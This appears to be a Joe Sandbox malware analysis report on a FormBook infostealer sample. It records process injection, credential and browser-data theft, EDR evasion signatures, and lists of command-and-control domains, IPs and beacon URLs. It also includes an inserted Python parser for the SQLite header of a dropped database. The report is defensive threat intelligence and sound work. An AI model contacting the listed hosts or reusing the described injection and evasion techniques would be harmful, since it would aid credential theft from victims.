Graph-level DNS/IP info: www.demovix.xyz; www.broomeorchard.xyz; 24 other IPs or domains. Graph-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures. Signature on www.broomeorchard.xyz: Performs DNS queries to domains with low reputation.

1. N2Qncau2rN.exe (started). Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces.
2. svchost.exe (started by N2Qncau2rN.exe). Signature: Maps a DLL or memory area into another process.
3. auuGcaPMTDojV.exe (injected by svchost.exe). Signature: Found direct / indirect Syscall (likely to bypass EDR).
4. RpcPing.exe (started by auuGcaPMTDojV.exe). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
5. auuGcaPMTDojV.exe (injected by RpcPing.exe) and firefox.exe (started by RpcPing.exe).
6. Network activity of the auuGcaPMTDojV.exe injected by RpcPing.exe: www.drivedoge.website 195.161.68.8, ports 60856, 60857, 60858 (RTCOMM-ASRU, Russian Federation); www.shanhaiguan.net 156.242.132.82, ports 60844, 60845, 60846 (POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles); 8 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR).

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
N2Qncau2rN.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook |
N2Qncau2rN.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.palcoconnector.net | 208.91.197.27 | true | true | | unknown
www.broomeorchard.xyz | 15.197.204.56 | true | true | | unknown
promasterev.shop | 3.33.130.190 | true | true | | unknown
wcq24.top | 154.23.184.240 | true | true | | unknown
es-lidl.online | 84.32.84.32 | true | true | | unknown
www.drivedoge.website | 195.161.68.8 | true | true | | unknown
www.demovix.xyz | 199.192.19.19 | true | true | | unknown
animekuid.xyz | 203.175.9.128 | true | true | | unknown
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | 3.91.127.116 | true | true | | unknown
doggieradio.net | 3.33.130.190 | true | true | | unknown
www.torex33.online | 194.58.112.174 | true | true | | unknown
childlesscatlady.today | 3.33.130.190 | true | true | | unknown
www.falconclub.online | 74.208.236.25 | true | true | | unknown
www.shanhaiguan.net | 156.242.132.82 | true | true | | unknown
multileveltravel.world | 3.33.130.190 | true | true | | unknown
www.es-lidl.online | unknown | unknown | true | | unknown
www.animekuid.xyz | unknown | unknown | true | | unknown
www.mtcep.org | unknown | unknown | true | | unknown
www.doggieradio.net | unknown | unknown | true | | unknown
www.wcq24.top | unknown | unknown | true | | unknown
www.multileveltravel.world | unknown | unknown | true | | unknown
www.childlesscatlady.today | unknown | unknown | true | | unknown
206.23.85.13.in-addr.arpa | unknown | unknown | true | | unknown
www.wajf.net | unknown | unknown | true | | unknown
www.promasterev.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.shanhaiguan.net/b6g5/ | true | | unknown
http://www.palcoconnector.net/bnrz/ | true | | unknown
http://www.wajf.net/eoqq/ | true | | unknown
http://www.shanhaiguan.net/b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.falconclub.online/sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.doggieradio.net/szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.palcoconnector.net/bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.demovix.xyz/azuc/ | true | | unknown
http://www.promasterev.shop/abrg/ | true | | unknown
http://www.falconclub.online/sld7/ | true | | unknown
http://www.demovix.xyz/azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ== | true | | unknown
http://www.wajf.net/eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.promasterev.shop/abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== | true | | unknown
http://www.animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.drivedoge.website/c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw== | true | | unknown
http://www.doggieradio.net/szy7/ | true | | unknown
http://www.animekuid.xyz/7un9/ | true | | unknown
http://www.childlesscatlady.today/itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.es-lidl.online/n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.multileveltravel.world/hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== | true | | unknown
http://www.childlesscatlady.today/itly/ | true | | unknown
http://www.torex33.online/hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtj | true | | unknown
http://www.es-lidl.online/n2dv/ | true | | unknown
http://www.drivedoge.website/c6cw/ | true | | unknown
http://www.torex33.online/hd7m/ | true | | unknown
                                                                                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://i1.cdn-image.com/__media__/js/min.js?v2.3RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
156.242.132.82 | www.shanhaiguan.net | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
3.91.127.116 | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | true
208.91.197.27 | www.palcoconnector.net | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
84.32.84.32 | es-lidl.online | Lithuania | 33922 | NTT-LT-ASLT | true
74.208.236.25 | www.falconclub.online | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
195.161.68.8 | www.drivedoge.website | Russian Federation | 8342 | RTCOMM-ASRU | true
194.58.112.174 | www.torex33.online | Russian Federation | 197695 | AS-REGRU | true
3.33.130.190 | promasterev.shop | United States | 8987 | AMAZONEXPANSIONGB | true
199.192.19.19 | www.demovix.xyz | United States | 22612 | NAMECHEAP-NETUS | true
203.175.9.128 | animekuid.xyz | Indonesia | 131303 | FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPH | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529035
Start date and time: 2024-10-08 15:31:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: N2Qncau2rN.exe (renamed because the original name is a hash value)
Original Sample Name: d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 51
• Number of non-executed functions: 302
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target auuGcaPMTDojV.exe, PID 7152 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session; see the PCAPs for the complete data
• VT rate limit hit for: N2Qncau2rN.exe
Time | Type | Description
09:33:59 | API Interceptor | 10363796x Sleep call for process: RpcPing.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
156.242.132.82 | PURCHASE ORDER.exe | malicious | FormBook | www.shanhaiguan.net/p2q3/
156.242.132.82 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.shanhaiguan.net/p2q3/
156.242.132.82 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.shanhaiguan.net/p2q3/
156.242.132.82 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.shanhaiguan.net/p2q3/
208.91.197.27 | RQ#071024.exe | malicious | FormBook | www.martaschrimpf.info/7kkb/?LT=aZbPzzPX3H&O47=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9YM7/JG15xNb5scP+2oNSt8ijob5Hig==
208.91.197.27 | Products Order Catalogs20242.exe | malicious | FormBook | www.dealsbyaustin.online/vikk/
208.91.197.27 | Arrival Notice_pdf.exe | malicious | FormBook | www.crochetpets.online/6s8n/
208.91.197.27 | Quote #260924.exe | malicious | FormBook | www.martaschrimpf.info/7kkb/
208.91.197.27 | Quote #270924.exe | malicious | FormBook | www.martaschrimpf.info/7kkb/
208.91.197.27 | Product Data Specifications_PDF.exe | malicious | FormBook | www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ
208.91.197.27 | PO5118000306 pdf.exe | malicious | FormBook | www.brainchainllc.online/x7gn/
208.91.197.27 | QlHhDu2uh1.exe | malicious | FormBook | www.kevin-torkelson.info/gekb/?vlJ0J=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWHr5s1DFjeSN2u6PXpPjiBw39CM7/tZ+YHIUNMByc2S3D5vP9Ng=&HDJP=Pnl8G6jPyrn
208.91.197.27 | Amended Proforma #U2013 SMWD5043.exe | malicious | FormBook | www.inastra.online/55bv/
208.91.197.27 | AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | www.palcoconnector.net/c45k/
84.32.84.32 | RQ#071024.exe | malicious | FormBook | www.thepeatear.online/lu5k/?O47=ODXYj9SHKZJf+lLWSD5bWs33an1UuUSGPEbmaLn0QSdqh031jXaTcKLg1x+9N8O9by/Xp7E95P2c73d08b4WEpTb1KZHJdxLaSQTbLs0J3NdMMrdrQ==&LT=aZbPzzPX3H
84.32.84.32 | 8mmZ7Bkoj1.exe | malicious | FormBook | www.thepeatear.online/pt4m/
84.32.84.32 | Products Order Catalogs20242.exe | malicious | FormBook | www.pinkpantys.shop/cyro/
84.32.84.32 | YSjOEAta07.exe | malicious | FormBook | www.pakmartcentral.shop/ml5l/
84.32.84.32 | Pending invoices.exe | malicious | FormBook | www.b-ambu.com/a2tr/
84.32.84.32 | PURCHASE ORDER-6350.exe | malicious | FormBook |
                                                                                                                                                                                                              • www.agilizeimob.app/we8s/
                                                                                                                                                                                                              Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • www.casesrep.site/7z6q/
                                                                                                                                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • www.dfmagazine.shop/7k8f/
                                                                                                                                                                                                              DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • www.agilizeimob.app/bnrj/
                                                                                                                                                                                                              Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • www.servehimfoundation.org/wlo5/
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              www.drivedoge.websiteDHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 195.161.68.8
                                                                                                                                                                                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 195.161.68.8
                                                                                                                                                                                                              cdl-lb-1356093980.us-east-1.elb.amazonaws.compresupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 184.73.212.51
                                                                                                                                                                                                              NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 44.207.39.65
                                                                                                                                                                                                              GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                                                                                              • 44.199.117.82
                                                                                                                                                                                                              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 54.81.206.248
                                                                                                                                                                                                              0001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 54.81.206.248
                                                                                                                                                                                                              firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 34.202.219.172
                                                                                                                                                                                                              firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.208.224.251
                                                                                                                                                                                                              Scan405.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 18.207.45.52
                                                                                                                                                                                                              ScanPDF_102.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 34.195.23.156
                                                                                                                                                                                                              Brudstyrken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 52.203.107.22
                                                                                                                                                                                                              www.palcoconnector.netAWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              www.broomeorchard.xyzRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              POWERLINE-AS-APPOWERLINEDATACENTERHKna.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 156.244.7.75
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 156.244.7.75
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 156.244.7.75
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 156.244.16.207
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 156.244.16.207
                                                                                                                                                                                                              na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                              • 103.57.228.99
                                                                                                                                                                                                              na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                              • 103.57.228.88
                                                                                                                                                                                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 154.195.194.109
                                                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 154.213.121.8
                                                                                                                                                                                                              http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 154.89.236.198
                                                                                                                                                                                                              NTT-LT-ASLTRQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              SOA SEPT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              • 84.32.44.139
                                                                                                                                                                                                              MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              • 84.32.44.139
                                                                                                                                                                                                              Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 84.32.84.32
                                                                                                                                                                                                              AMAZON-AESUSoriginal (3).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 23.22.254.206
                                                                                                                                                                                                              T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 44.213.25.70
                                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              • 3.84.165.70
                                                                                                                                                                                                              https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 3.5.77.185
                                                                                                                                                                                                              PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 34.205.242.146
                                                                                                                                                                                                              http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 35.171.206.145
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.173.232.215
                                                                                                                                                                                                              https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 52.203.206.228
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.173.232.249
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 44.223.211.251
                                                                                                                                                                                                              CONFLUENCE-NETWORK-INCVGRQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.39
                                                                                                                                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                              • 208.91.197.27
                                                                                                                                                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
• 208.91.197.27
Shipping Documents_pdf.exe (malicious, FormBook)
• 208.91.197.27
Quote #260924.exe (malicious, FormBook)
• 208.91.197.27
Quote #270924.exe (malicious, FormBook)
• 208.91.197.27
shipping notification_pdf.exe (malicious, FormBook)
• 208.91.197.27
No context
No context
Process: C:\Windows\SysWOW64\RpcPing.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1221538113908904
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5: C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1: 6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256: CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512: 01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
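The File Type line above is a decode of the 100-byte SQLite 3 file header, and a database written by RpcPing.exe (a Microsoft RPC diagnostic tool that creates no SQLite files of its own) is exactly the artifact an analyst pulls from the sandbox and opens. The parser below is an added example, not part of the Joe Sandbox report: it reads the header fields the report prints, rebuilds that summary line, and checks the declared page count against the file length. The header bytes are constructed to carry the values listed above; everything after the header is zero padding, so only the header is meaningful. One arithmetic point the report does not spell out: 89 pages of 2048 bytes is 182272 bytes, and because version-valid-for (7) equals the change counter (7) that in-header count is authoritative, so the remaining 14336 bytes of the 196608-byte file lie past the logical end of the database.

```python
"""Decode a SQLite 3 file header the way the report's File Type line does.

Added example, not part of the Joe Sandbox report. The sample header is
constructed to match the values reported for the database RpcPing.exe dropped.
"""
import struct

# Offsets 0..99 of the SQLite 3 header, all big-endian (sqlite.org/fileformat.html).
HEADER_FMT = ">16sHBBBBBBIIIIIIIIIIII20sII"
MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def build_sample_db(total_size: int = 196608) -> bytes:
    """Constructed database: reported header values followed by zero padding."""
    hdr = struct.pack(
        HEADER_FMT,
        MAGIC,
        2048, 1, 1, 0, 64, 32, 32,   # page size, write/read version, reserved, payload fractions
        7,                           # file change counter
        89,                          # database size in pages
        0, 0,                        # first freelist trunk page, freelist page count
        0x36,                        # schema cookie
        4,                           # schema format number
        0, 0,                        # default cache size, largest root b-tree page
        1,                           # text encoding: 1 = UTF-8
        0, 0, 0,                     # user version, incremental-vacuum mode, application id
        bytes(20),                   # reserved, must be zero
        7,                           # version-valid-for
        3042000,                     # SQLITE_VERSION_NUMBER of the last writer (3.42.0)
    )
    return hdr + bytes(total_size - len(hdr))


def parse_sqlite_header(data: bytes) -> dict:
    if len(data) < 100 or data[:16] != MAGIC:
        raise ValueError("not a SQLite 3 database")
    f = struct.unpack(HEADER_FMT, data[:100])
    page_size = 65536 if f[1] == 1 else f[1]    # value 1 encodes a 64 KiB page
    change_counter, pages = f[8], f[9]
    version_valid_for, sqlite_version = f[21], f[22]
    # The in-header page count is authoritative only when it is non-zero and
    # version-valid-for equals the change counter; otherwise derive from the size.
    pages_valid = pages != 0 and version_valid_for == change_counter
    logical_size = pages * page_size if pages_valid else len(data)
    return {
        "page_size": page_size,
        "change_counter": change_counter,
        "pages": pages,
        "schema_cookie": f[12],
        "schema_format": f[13],
        "encoding": ENCODINGS.get(f[16], f"unknown({f[16]})"),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
        "sqlite_version_str": f"{sqlite_version // 1000000}."
                              f"{sqlite_version // 1000 % 1000}.{sqlite_version % 1000}",
        "pages_valid": pages_valid,
        "logical_size": logical_size,
        "trailing_bytes": len(data) - logical_size,
    }


def describe(h: dict) -> str:
    """Reproduce the one-line summary a file identifier prints for the header."""
    return (f"SQLite 3.x database, last written using SQLite version {h['sqlite_version']}, "
            f"page size {h['page_size']}, file counter {h['change_counter']}, "
            f"database pages {h['pages']}, cookie 0x{h['schema_cookie']:x}, "
            f"schema {h['schema_format']}, {h['encoding']}, "
            f"version-valid-for {h['version_valid_for']}")


if __name__ == "__main__":
    info = parse_sqlite_header(build_sample_db())
    print(describe(info))
    print(f"writer {info['sqlite_version_str']}, logical size {info['logical_size']} bytes, "
          f"{info['trailing_bytes']} bytes past the last page")
```

Run against the real dropped file, the same function tells you whether the database is a complete copy (page count consistent with the size) before you open it with the sqlite3 client to see which tables the injected process filled.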
Process: C:\Users\user\Desktop\N2Qncau2rN.exe
File Type: data
Category: dropped
Size (bytes): 288256
Entropy (8bit): 7.993435173307934
Encrypted: true
SSDEEP: 6144:0U+OS51KmKlOyL3VfDxGb96q6B588GI5f704njbPiSQFSGz:BSzWhNGbAq6P8895f7eSQFvz
MD5: AE51354D8ED39A1721CE578975302325
SHA1: 8C4E231E4722DA9B08ABF517D7DEC408EB51060B
SHA-256: 49FC2721F0A256F19323C007435D8097A08B09E3FEFAB268A302D7C4382634DE
SHA-512: 5648C3944467C8E865257E19D7B4A3E71F198B157CE9B242C95338C43F5D04E28787D071381627925D5C7D1C623A0AECDEBB6C61EAE45DF5A662B9992B98BE23
Malicious: false
Reputation: low
